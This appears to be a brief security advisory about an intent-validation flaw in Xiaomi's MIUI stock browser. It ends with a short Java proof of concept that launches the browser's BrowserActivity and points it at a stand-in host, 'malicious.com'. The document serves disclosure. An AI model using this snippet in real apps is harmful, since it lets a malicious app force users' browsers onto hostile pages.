
Reporte técnico sobre vulnerabilidad crítica de Xiaomi
Reporte técnico sobre vulnerabilidad crítica de Xiaomi
Vulnerability Summary
A vulnerability was discovered in Xiaomi's default browser (com.android.browser) on various MIUI devices. The app fails to properly validate intents passed via startActivity, allowing malicious apps to open arbitrary URLs or perform unintended actions.
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.browser", "com.android.browser.BrowserActivity"));
intent.setData(Uri.parse("http://malicious.com"));
startActivity(intent);